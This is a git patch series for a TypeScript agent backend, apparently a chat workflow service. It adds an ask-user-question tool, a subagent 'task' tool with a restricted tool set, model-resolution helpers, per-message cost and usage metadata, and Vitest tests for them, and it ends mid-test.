+describe("askUserQuestionInputSchema", () => { + it("accepts a valid single-question payload", () => { + const result = askUserQuestionInputSchema.safeParse({ + questions: [ + { + question: "Which model do you want?", + header: "Model", + options: [ + { label: "Haiku", description: "Fast" }, + { label: "Sonnet", description: "Balanced" }, + ], + multiSelect: false, + }, + ], + }); + expect(result.success).toBe(true); + }); + + it("rejects an empty questions list", () => { + const result = askUserQuestionInputSchema.safeParse({ questions: [] }); + expect(result.success).toBe(false); + }); + + it("rejects more than 4 questions per payload", () => { + const q = { + question: "x?", + header: "h", + options: [ + { label: "a", description: "a" }, + { label: "b", description: "b" }, + ], + multiSelect: false, + }; + const result = askUserQuestionInputSchema.safeParse({ questions: [q, q, q, q, q] }); + expect(result.success).toBe(false); + }); + + it("rejects a question with fewer than 2 options", () => { + const result = askUserQuestionInputSchema.safeParse({ + questions: [ + { + question: "x?", + header: "h", + options: [{ label: "only", description: "one" }], + multiSelect: false, + }, + ], + }); + expect(result.success).toBe(false); + }); + + it("rejects a header longer than 12 chars", () => { + const result = askUserQuestionInputSchema.safeParse({ + questions: [ + { + question: "x?", + header: "this-header-is-way-too-long", + options: [ + { label: "a", description: "a" }, + { label: "b", description: "b" }, + ], + multiSelect: false, + }, + ], + }); + expect(result.success).toBe(false); + }); +}); + +describe("askUserQuestionTool — server-side wiring", () => { + it("has no execute (it's a client-side tool the chat UI fulfills)", () => { + expect(askUserQuestionTool.execute).toBeUndefined(); + }); +}); + +describe("askUserQuestionTool.toModelOutput", () => { + it("returns a generic message when no output is present", () => { + expect(askUserQuestionTool.toModelOutput!(undefined as never)).toEqual({ + type: "text", + value: "User did not respond to questions.", + }); + }); + + it("formats `declined: true` as a clear decline message", () => { + const result = askUserQuestionTool.toModelOutput!({ declined: true } as never); + expect(result).toMatchObject({ + type: "text", + value: expect.stringMatching(/declined to answer/i), + }); + }); + + it("formats answered questions as a parseable Q=A summary", () => { + const result = askUserQuestionTool.toModelOutput!({ + answers: { + "Which model do you want?": "Haiku", + "Which features?": ["Streaming", "Tools"], + }, + } as never); + expect(result).toMatchObject({ + type: "text", + value: expect.stringContaining(`"Which model do you want?"="Haiku"`), + }); + expect((result as { value: string }).value).toContain(`"Which features?"="Streaming, Tools"`); + }); +}); diff --git a/lib/agent/tools/__tests__/taskTool.test.ts b/lib/agent/tools/__tests__/taskTool.test.ts new file mode 100644 index 000000000..609037918 --- /dev/null +++ b/lib/agent/tools/__tests__/taskTool.test.ts @@ -0,0 +1,146 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { taskTool } from "@/lib/agent/tools/taskTool"; +import { streamText } from "ai"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("ai", async () => { + const actual = await vi.importActual("ai"); + return { ...actual, streamText: vi.fn() }; +}); + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +// `model` is normally attached by `runAgentStep` before the subagent +// sees the context. The opaque sentinel below is enough for taskTool +// to pass it into `streamText` — we assert the same instance flows +// through. +const mainModel = { __sentinel: "main-model" } as never; +const subagentModelOverride = { __sentinel: "subagent-model" } as never; +const ctx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, + model: mainModel, +}; + +function makeStreamTextResult(finalText: string) { + return { + fullStream: (async function* () { + // empty — execute only awaits `result.finishReason` + result.response + })(), + finishReason: Promise.resolve("stop"), + response: Promise.resolve({ + messages: [ + { + role: "assistant", + content: [{ type: "text", text: finalText }], + }, + ], + }), + }; +} + +beforeEach(() => { + vi.clearAllMocks(); + vi.mocked(connectVercel).mockResolvedValue({ workingDirectory: "/sandbox/mono" } as never); +}); + +describe("taskTool.execute", () => { + it("runs a sub-streamText with the subagent system prompt + task + instructions", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamTextResult("Task done.") as never); + const result = (await taskTool.execute!( + { task: "Find the largest .ts file", instructions: "Use glob and stat to find it" }, + { experimental_context: ctx } as never, + )) as { success: boolean; summary: string }; + expect(result.success).toBe(true); + expect(result.summary).toBe("Task done."); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as Record; + // system prompt contains task + instructions so the subagent knows its scope + expect(args.system).toEqual(expect.stringContaining("Find the largest .ts file")); + expect(args.system).toEqual(expect.stringContaining("Use glob and stat")); + }); + + it("registers only the executor tool set (no recursion, no task/ask/skill/todo/fetch)", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); + await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { tools: Record }; + const toolNames = Object.keys(args.tools).sort(); + expect(toolNames).toEqual(["bash", "edit", "glob", "grep", "read", "write"]); + // Critical: NO task (recursion guard) and NO client-side tools. + expect(args.tools).not.toHaveProperty("task"); + expect(args.tools).not.toHaveProperty("ask_user_question"); + expect(args.tools).not.toHaveProperty("skill"); + expect(args.tools).not.toHaveProperty("todo_write"); + expect(args.tools).not.toHaveProperty("web_fetch"); + }); + + it("passes a non-empty prompt so the model has something to act on", async () => { + // Regression: a previous version called streamText with `messages: []`, + // which caused the AI SDK to throw NoOutputGeneratedError because zero + // steps were recorded — the model had a system prompt but no user turn + // to respond to. The subagent must receive an explicit user-side trigger. + vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); + await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { + prompt?: string; + messages?: unknown[]; + }; + const hasPrompt = typeof args.prompt === "string" && args.prompt.length > 0; + const hasMessages = Array.isArray(args.messages) && args.messages.length > 0; + expect(hasPrompt || hasMessages).toBe(true); + }); + + it("inherits the parent's `model` from agent context when no subagentModel override is set", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); + await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; + expect(args.model).toBe(mainModel); + }); + + it("prefers `subagentModel` over `model` when both are set on the context", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); + await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: { ...ctx, subagentModel: subagentModelOverride }, + } as never); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; + expect(args.model).toBe(subagentModelOverride); + }); + + it("returns success:false when no assistant text is in the response", async () => { + vi.mocked(streamText).mockReturnValue({ + fullStream: (async function* () {})(), + finishReason: Promise.resolve("stop"), + response: Promise.resolve({ messages: [] }), + } as never); + const result = (await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never)) as { success: boolean; summary: string }; + expect(result.success).toBe(false); + expect(result.summary).toMatch(/no.*assistant/i); + }); + + it("returns success:false with a descriptive error when streamText throws", async () => { + vi.mocked(streamText).mockImplementation(() => { + throw new Error("gateway down"); + }); + const result = (await taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/gateway down/); + }); + + it("throws when agent context is missing the `model` field", async () => { + await expect( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: { sandbox: ctx.sandbox /* no model */ }, + } as never), + ).rejects.toThrow(/model not initialized/i); + }); +}); diff --git a/lib/agent/tools/askUserQuestionTool.ts b/lib/agent/tools/askUserQuestionTool.ts new file mode 100644 index 000000000..8d5e1f4ed --- /dev/null +++ b/lib/agent/tools/askUserQuestionTool.ts @@ -0,0 +1,90 @@ +import { tool, type UIToolInvocation } from "ai"; +import { z } from "zod"; + +const optionSchema = z.object({ + label: z.string().describe("1-5 words, concise choice text"), + description: z.string().describe("Explanation of trade-offs/implications"), +}); + +const questionSchema = z.object({ + question: z.string().describe("The complete question to ask, ends with '?'"), + header: z.string().max(12).describe("Short label for tab/chip display"), + options: z.array(optionSchema).min(2).max(4), + multiSelect: z.boolean().default(false), +}); + +export const askUserQuestionInputSchema = z.object({ + questions: z.array(questionSchema).min(1).max(4), +}); + +export type AskUserQuestionInput = z.infer; + +// Output is filled in by the chat UI after the user answers. Either: +// - `{ answers: { [question]: string | string[] } }` — keyed by question text +// - `{ declined: true }` — user dismissed the question component +const answerValueSchema = z.string().or(z.array(z.string())); +const askUserQuestionOutputSchema = z + .object({ answers: z.record(z.string(), answerValueSchema) }) + .or(z.object({ declined: z.literal(true) })); + +export type AskUserQuestionOutput = z.infer; + +/** + * `ask_user_question` — client-side tool for pausing the agent loop to + * collect human input. The model emits a tool-call with the question + * schema; `streamText` halts because there's no server `execute`, the + * chat UI renders the question UI, collects answers, and submits them + * back to the next workflow request as a `tool-output-available` part + * inside `messages`. The next workflow turn picks up where this one + * left off — no WDK pause/resume hook needed. + * + * `toModelOutput` formats the (eventual) user answers into a single + * text block the model can parse on the next turn. + */ +export const askUserQuestionTool = tool({ + description: `Use this tool when you need to ask the user questions during execution. This allows you to: +1. Gather user preferences or requirements +2. Clarify ambiguous instructions +3. Get decisions on implementation choices as you work +4. Offer choices to the user about what direction to take. + +Usage notes: +- Users will always be able to select "Other" to provide custom text input +- Use multiSelect: true to allow multiple answers to be selected for a question +- If you recommend a specific option, make that the first option in the list and add "(Recommended)" at the end of the label +- Questions appear as tabs; users navigate between them before submitting`, + inputSchema: askUserQuestionInputSchema, + outputSchema: askUserQuestionOutputSchema, + // NO execute: this is a client-side tool. streamText halts the run after + // emitting the tool-call; the chat UI fulfills it asynchronously. + toModelOutput: output => { + if (!output) { + return { type: "text", value: "User did not respond to questions." }; + } + + if ("declined" in output && output.declined) { + return { + type: "text", + value: + "User declined to answer questions. You should continue without this information or ask in a different way.", + }; + } + + if ("answers" in output) { + const formatted = Object.entries(output.answers) + .map(([question, answer]) => { + const value = Array.isArray(answer) ? answer.join(", ") : answer; + return `"${question}"="${value}"`; + }) + .join(", "); + return { + type: "text", + value: `User has answered your questions: ${formatted}. You can now continue with the user's answers in mind.`, + }; + } + + return { type: "text", value: "User responded to questions." }; + }, +}); + +export type AskUserQuestionToolUIPart = UIToolInvocation; diff --git a/lib/agent/tools/buildSubagentTools.ts b/lib/agent/tools/buildSubagentTools.ts new file mode 100644 index 000000000..336983252 --- /dev/null +++ b/lib/agent/tools/buildSubagentTools.ts @@ -0,0 +1,32 @@ +import { bashTool } from "@/lib/agent/tools/bashTool"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { globTool } from "@/lib/agent/tools/globTool"; + +/** + * Subagent tool set — mirrors open-agents' `executor` subagent + * (read/write/edit/grep/glob/bash). Explicitly EXCLUDES the parent + * agent's composite + client-side tools: + * - `task` — recursion guard. Subagents are leaves of the agent + * tree; nesting them would bloat traces, double cost per spawn, + * and risk infinite loops. + * - `ask_user_question` — subagents run autonomously without human + * input. + * - `skill` — subagents execute concrete work; skill loading is the + * parent's job. + * - `todo_write` — the parent does the planning. + * - `web_fetch` — parity with open-agents' executor / explorer / + * design subagents, which all omit it. + */ +export function buildSubagentTools() { + return { + bash: bashTool, + read: readFileTool, + write: writeFileTool, + edit: editFileTool, + grep: grepTool, + glob: globTool, + }; +} diff --git a/lib/agent/tools/getMainModel.ts b/lib/agent/tools/getMainModel.ts new file mode 100644 index 000000000..961a038b5 --- /dev/null +++ b/lib/agent/tools/getMainModel.ts @@ -0,0 +1,26 @@ +import type { LanguageModel } from "ai"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve the main agent's language model from `experimental_context`. + * Mirrors open-agents' `getMainModel` (`tools/utils.ts`). Throws with a + * descriptive error if the context wasn't populated by `runAgentStep`. + * + * @param experimental_context - Opaque context object the AI SDK threads + * into tool execute callbacks. + * @param toolName - Optional tool name for richer error messages. + */ +export function getMainModel(experimental_context: unknown, toolName?: string): LanguageModel { + const context = isAgentContext(experimental_context) ? experimental_context : undefined; + if (!context?.model) { + const toolInfo = toolName ? ` (tool: ${toolName})` : ""; + const contextInfo = context + ? `Context exists but model is missing. Context keys: ${Object.keys(context).join(", ")}` + : "Context is undefined or null"; + throw new Error( + `Model not initialized in context${toolInfo}. ${contextInfo}. ` + + "Ensure runAgentStep sets experimental_context: { model, ... }", + ); + } + return context.model; +} diff --git a/lib/agent/tools/getSubagentModel.ts b/lib/agent/tools/getSubagentModel.ts new file mode 100644 index 000000000..07735485e --- /dev/null +++ b/lib/agent/tools/getSubagentModel.ts @@ -0,0 +1,24 @@ +import type { LanguageModel } from "ai"; +import { isAgentContext } from "@/lib/agent/tools/isAgentContext"; + +/** + * Resolve the subagent's language model from `experimental_context`, + * falling back to the main agent's model when no dedicated subagent + * model is configured. Mirrors open-agents' `getSubagentModel` + * (`tools/utils.ts`): `ctx.subagentModel ?? ctx.model`. + * + * @param experimental_context - Opaque context object the AI SDK threads + * into tool execute callbacks. + * @param toolName - Optional tool name for richer error messages. + */ +export function getSubagentModel(experimental_context: unknown, toolName?: string): LanguageModel { + const context = isAgentContext(experimental_context) ? experimental_context : undefined; + if (!context?.model) { + const toolInfo = toolName ? ` (tool: ${toolName})` : ""; + throw new Error( + `Model not initialized in context${toolInfo}. ` + + "Ensure runAgentStep sets experimental_context: { model, ... }", + ); + } + return context.subagentModel ?? context.model; +} diff --git a/lib/agent/tools/taskTool.ts b/lib/agent/tools/taskTool.ts new file mode 100644 index 000000000..83381d58f --- /dev/null +++ b/lib/agent/tools/taskTool.ts @@ -0,0 +1,122 @@ +import { streamText, stepCountIs, tool } from "ai"; +import { z } from "zod"; +import { buildSubagentTools } from "@/lib/agent/tools/buildSubagentTools"; +import { getSubagentModel } from "@/lib/agent/tools/getSubagentModel"; + +const SUBAGENT_STEP_LIMIT = 30; + +const taskInputSchema = z.object({ + task: z.string().describe("Short description of the task (displayed to user)"), + instructions: z + .string() + .describe( + [ + "Detailed instructions for the subagent. Include:", + "- Goal and deliverables", + "- Step-by-step procedure", + "- Constraints and patterns to follow", + "- How to verify the work", + ].join("\n"), + ), +}); + +const SUBAGENT_SYSTEM_PROMPT = `You are a focused subagent invoked by a parent agent. Run autonomously — do not ask the user clarifying questions. Complete the delegated task using the tools you have, then return a concise summary of what you did. + +Constraints: +- Up to ${SUBAGENT_STEP_LIMIT} tool steps total +- No follow-up questions to the user +- Stay within the scope described in the task; do not pursue tangents +- End with a brief plain-text summary (no markdown headings, no bulleted action list — just what you accomplished)`; + +/** + * `task` — delegate focused, autonomous work to a subagent. The + * subagent runs its own `streamText` loop with a curated tool set, + * isolated from the parent's conversation history, and returns a + * concise summary that the parent can incorporate. + * + * Slim port of open-agents' multi-type SUBAGENT_REGISTRY → single + * generic subagent. Streaming progress isn't piped to the UI (the + * parent sees one long-running tool call until completion); add an + * async-generator execute later if live progress matters. + */ +export const taskTool = tool({ + description: `Launch a subagent to handle complex tasks autonomously. + +WHEN TO USE: +- Clearly-scoped work that can be delegated with explicit instructions +- Work where focused execution would clutter the main conversation +- Multi-step exploration / refactoring that you'd otherwise interleave with other turns + +WHEN NOT TO USE (do it yourself): +- Simple, single-file or single-change edits +- Tasks where you already have all the context you need +- Ambiguous work that requires back-and-forth clarification + +BEHAVIOR: +- The subagent works AUTONOMOUSLY without asking follow-up questions +- It runs up to ${SUBAGENT_STEP_LIMIT} tool steps and then returns +- It returns ONLY a concise summary — internal steps are isolated from the parent + +HOW TO USE: +- Provide a short \`task\` string summarizing the goal (for display) +- Provide detailed \`instructions\` including goals, steps, constraints, and verification criteria + +IMPORTANT: +- Be explicit and concrete — the subagent cannot ask clarifying questions +- Include critical context (APIs, function names, file paths) in the instructions +- The parent agent does not see the subagent's internal tool calls, only its final summary`, + inputSchema: taskInputSchema, + execute: async ({ task, instructions }, { experimental_context, abortSignal }) => { + // Resolves to ctx.subagentModel ?? ctx.model, throwing if context + // wasn't populated by runAgentStep. Mirrors open-agents' task tool + // (`getSubagentModel(experimental_context, "task")`). + const subagentModel = getSubagentModel(experimental_context, "task"); + + try { + // `prompt` (not `messages: []`) is required — the AI SDK records zero + // steps and throws NoOutputGeneratedError if the model has only a + // system prompt with no user turn. Mirrors open-agents' task tool. + const result = streamText({ + model: subagentModel, + system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`, + prompt: "Complete this task and provide a summary of what you accomplished.", + tools: buildSubagentTools(), + stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT), + experimental_context, + abortSignal, + }); + + // Drain fullStream so the subagent actually runs to completion. + // Streaming progress back to the parent UI is not wired in this slim + // port — the parent sees one long-running tool call until the + // subagent finishes. + for await (const _part of result.fullStream) { + void _part; + } + + const response = await result.response; + const lastAssistant = response.messages.findLast(m => m.role === "assistant"); + const content = lastAssistant?.content; + + let summary = ""; + if (typeof content === "string") { + summary = content; + } else if (Array.isArray(content)) { + const lastText = content.findLast(p => p.type === "text"); + if (lastText && "text" in lastText) summary = lastText.text; + } + + if (!summary) { + return { + success: false, + summary: "Subagent finished with no assistant text. The task may be incomplete.", + }; + } + + return { success: true, summary }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Subagent failed: ${message}` }; + } + }, +}); From bd67ac7d277fdcc6be77387cfcefe54bf2a666f6 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 18:57:36 -0500 Subject: [PATCH 07/10] feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow. New (SRP, one function per file): - lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata. - lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records. - lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata. - lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts. Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4). Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise) Tests: 3106/3106 pass; production typecheck clean; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- .../workflows/__tests__/runAgentStep.test.ts | 102 ++++++++ app/lib/workflows/runAgentStep.ts | 10 +- .../messageMetadata/AgentMessageMetadata.ts | 29 +++ .../AgentStepFinishMetadata.ts | 11 + .../GatewayProviderMetadata.ts | 18 ++ .../__tests__/addLanguageModelUsage.test.ts | 49 ++++ .../__tests__/addTokenCounts.test.ts | 27 ++ .../buildMessageMetadataCallback.test.ts | 93 +++++++ .../__tests__/extractGatewayCost.test.ts | 28 +++ .../__tests__/hasGatewayShape.test.ts | 25 ++ .../messageMetadata/addLanguageModelUsage.ts | 49 ++++ lib/agent/messageMetadata/addTokenCounts.ts | 13 + .../buildMessageMetadataCallback.ts | 81 ++++++ .../messageMetadata/extractGatewayCost.ts | 20 ++ lib/agent/messageMetadata/hasGatewayShape.ts | 18 ++ lib/chat/setupChatRequest.ts | 10 +- package.json | 12 +- pnpm-lock.yaml | 230 +++++------------- 18 files changed, 648 insertions(+), 177 deletions(-) create mode 100644 app/lib/workflows/__tests__/runAgentStep.test.ts create mode 100644 lib/agent/messageMetadata/AgentMessageMetadata.ts create mode 100644 lib/agent/messageMetadata/AgentStepFinishMetadata.ts create mode 100644 lib/agent/messageMetadata/GatewayProviderMetadata.ts create mode 100644 lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts create mode 100644 lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts create mode 100644 lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts create mode 100644 lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts create mode 100644 lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts create mode 100644 lib/agent/messageMetadata/addLanguageModelUsage.ts create mode 100644 lib/agent/messageMetadata/addTokenCounts.ts create mode 100644 lib/agent/messageMetadata/buildMessageMetadataCallback.ts create mode 100644 lib/agent/messageMetadata/extractGatewayCost.ts create mode 100644 lib/agent/messageMetadata/hasGatewayShape.ts diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts new file mode 100644 index 000000000..429a37505 --- /dev/null +++ b/app/lib/workflows/__tests__/runAgentStep.test.ts @@ -0,0 +1,102 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { streamText } from "ai"; +import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; + +vi.mock("ai", async () => { + const actual = await vi.importActual("ai"); + return { ...actual, streamText: vi.fn() }; +}); + +// Avoid pulling in real gateway / fetch surface. +vi.mock("@ai-sdk/gateway", () => ({ + gateway: vi.fn((modelId: string) => ({ modelId, __mock: "gateway" })), +})); + +function makeStreamResult(opts?: { metadataCalls?: Array }) { + const calls = opts?.metadataCalls ?? []; + return { + toUIMessageStream: vi.fn((streamOpts: { messageMetadata?: unknown }) => { + // Capture the callback so tests can inspect it + calls.push(streamOpts.messageMetadata); + return (async function* () { + yield { type: "start" }; + yield { type: "finish" }; + })(); + }), + finishReason: Promise.resolve("stop"), + }; +} + +function makeWritable() { + const written: unknown[] = []; + const stream = new WritableStream({ + write(chunk) { + written.push(chunk); + }, + }); + return { stream, written }; +} + +const baseInput = { + messages: [ + { + id: "m1", + role: "user" as const, + parts: [{ type: "text" as const, text: "hi" }], + }, + ], + modelId: "anthropic/claude-haiku-4.5", + agentContext: { + sandbox: { state: { type: "vercel" }, workingDirectory: "/sandbox/mono" }, + }, +}; + +describe("runAgentStep", () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + it("wires a messageMetadata callback into toUIMessageStream", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + expect(captured).toHaveLength(1); + expect(typeof captured[0]).toBe("function"); + }); + + it("the wired callback emits modelId on finish-step parts", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + const cb = captured[0] as (args: { + part: { type: string; usage?: unknown; finishReason?: string }; + }) => { modelId?: string } | undefined; + const meta = cb({ + part: { + type: "finish-step", + usage: { inputTokens: 10, outputTokens: 5 }, + finishReason: "stop", + }, + }); + expect(meta).toBeDefined(); + expect(meta?.modelId).toBe("anthropic/claude-haiku-4.5"); + }); + + it("the wired callback returns undefined for non-finish-step parts", async () => { + const captured: unknown[] = []; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never); + const { stream } = makeWritable(); + + await runAgentStep({ ...baseInput, writable: stream } as never); + + const cb = captured[0] as (args: { part: { type: string } }) => unknown; + expect(cb({ part: { type: "text-delta" } })).toBeUndefined(); + expect(cb({ part: { type: "start" } })).toBeUndefined(); + }); +}); diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts index b487285dc..983bf4d7a 100644 --- a/app/lib/workflows/runAgentStep.ts +++ b/app/lib/workflows/runAgentStep.ts @@ -4,6 +4,7 @@ import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext"; +import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback"; export type RunAgentStepInput = { messages: UIMessage[]; @@ -45,7 +46,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe hasSandboxState: Boolean(input.agentContext.sandbox?.state), }); - const modelMessages = convertToModelMessages(input.messages); + const modelMessages = await convertToModelMessages(input.messages); const tools = buildAgentTools({ skills: input.agentContext.skills }); // Construct the model here (not in the workflow input) — LanguageModel // instances aren't JSON-serializable and can't ride durable inputs. @@ -69,7 +70,12 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe // doesn't leak the lock. const writer = input.writable.getWriter(); try { - for await (const part of result.toUIMessageStream()) { + // `messageMetadata` emits {modelId, usage, cost} chunks the UI + // renders as model/cost badges. Mirrors open-agents' chat workflow + // shape so sandbox.recoupable.com sees the same metadata when cut + // over to api's /api/chat/workflow. + const messageMetadata = buildMessageMetadataCallback({ modelId: input.modelId }); + for await (const part of result.toUIMessageStream({ messageMetadata })) { await writer.write(part); } } finally { diff --git a/lib/agent/messageMetadata/AgentMessageMetadata.ts b/lib/agent/messageMetadata/AgentMessageMetadata.ts new file mode 100644 index 000000000..df306c057 --- /dev/null +++ b/lib/agent/messageMetadata/AgentMessageMetadata.ts @@ -0,0 +1,29 @@ +import type { FinishReason, LanguageModelUsage } from "ai"; +import type { AgentStepFinishMetadata } from "@/lib/agent/messageMetadata/AgentStepFinishMetadata"; + +/** + * Metadata emitted on each assistant turn via the `messageMetadata` + * callback in `runAgentStep`. Mirrors open-agents' + * `apps/web/app/types.ts:WebAgentMessageMetadata` byte-for-byte so the + * sandbox.recoupable.com UI can render model/cost/usage badges when + * cut over to api's `/api/chat/workflow`. Now that api ships + * `ai@^6.0.190`, `LanguageModelUsage` is the same flat-shape type + * open-agents has been using — no shape conversion needed. + */ +export type AgentMessageMetadata = { + /** Model the client requested (e.g. user selection in the UI). */ + selectedModelId?: string; + /** Model actually used for the call (may differ from selected under gateway fallback). */ + modelId?: string; + /** Usage from the most recent `finish-step`. */ + lastStepUsage?: LanguageModelUsage; + /** Cumulative usage across every step in this message. */ + totalMessageUsage?: LanguageModelUsage; + /** Gateway-reported cost of the most recent step, in USD. */ + lastStepCost?: number; + /** Cumulative gateway-reported cost across every step of the message, in USD. */ + totalMessageCost?: number; + lastStepFinishReason?: FinishReason; + lastStepRawFinishReason?: string; + stepFinishReasons?: AgentStepFinishMetadata[]; +}; diff --git a/lib/agent/messageMetadata/AgentStepFinishMetadata.ts b/lib/agent/messageMetadata/AgentStepFinishMetadata.ts new file mode 100644 index 000000000..4bc618cbd --- /dev/null +++ b/lib/agent/messageMetadata/AgentStepFinishMetadata.ts @@ -0,0 +1,11 @@ +import type { FinishReason } from "ai"; + +/** + * Per-finish-step record kept on the assistant message so the UI can + * render a finish-reason history. Mirrors open-agents' + * `WebAgentStepFinishMetadata` in `apps/web/app/types.ts`. + */ +export type AgentStepFinishMetadata = { + finishReason: FinishReason; + rawFinishReason?: string; +}; diff --git a/lib/agent/messageMetadata/GatewayProviderMetadata.ts b/lib/agent/messageMetadata/GatewayProviderMetadata.ts new file mode 100644 index 000000000..0c10c954a --- /dev/null +++ b/lib/agent/messageMetadata/GatewayProviderMetadata.ts @@ -0,0 +1,18 @@ +/** + * Shape of the Vercel AI Gateway entry in `providerMetadata`. + * Mirrors open-agents' `apps/web/app/workflows/gateway-metadata.ts`. + * + * The gateway surfaces per-step cost information alongside routing + * diagnostics. We only consume the `cost` field; other fields are + * documented for reference and forward-compat. + */ +export interface GatewayProviderMetadata { + gateway: { + cost?: string; + marketCost?: string; + inferenceCost?: string; + inputInferenceCost?: string; + outputInferenceCost?: string; + generationId?: string; + }; +} diff --git a/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts b/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts new file mode 100644 index 000000000..4ba0b0234 --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts @@ -0,0 +1,49 @@ +import { describe, it, expect } from "vitest"; +import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage"; + +describe("addLanguageModelUsage", () => { + it("sums basic input/output/total tokens", () => { + const result = addLanguageModelUsage( + { inputTokens: 100, outputTokens: 50, totalTokens: 150 }, + { inputTokens: 200, outputTokens: 75, totalTokens: 275 }, + 